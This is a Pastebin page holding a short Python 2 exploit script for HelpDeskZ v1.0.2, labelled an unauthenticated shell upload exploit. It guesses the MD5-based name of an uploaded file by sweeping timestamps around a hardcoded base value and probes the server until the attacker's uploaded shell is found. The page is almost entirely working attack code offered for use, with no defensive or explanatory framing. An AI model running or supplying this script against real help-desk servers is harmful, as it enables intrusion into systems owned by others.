Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import hashlib
- import time
- import sys
- import requests
- print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
- if len(sys.argv) < 3:
- print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
- sys.exit(1)
- helpdeskzBaseUrl = sys.argv[1]
- fileName = sys.argv[2]
- currentTime = int(time.time())
- for a in range (-24,24):
- for x in range(-30, 30):
- plaintext = fileName + str(1548213826 - x - 60*60*a)
- md5hash = hashlib.md5(plaintext).hexdigest()
- url = helpdeskzBaseUrl+md5hash+'.txt'
- response = requests.head(url)
- if response.status_code == 200:
- print "found!"
- print url
- sys.exit(0)
- print "Sorry, I did not find anything"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
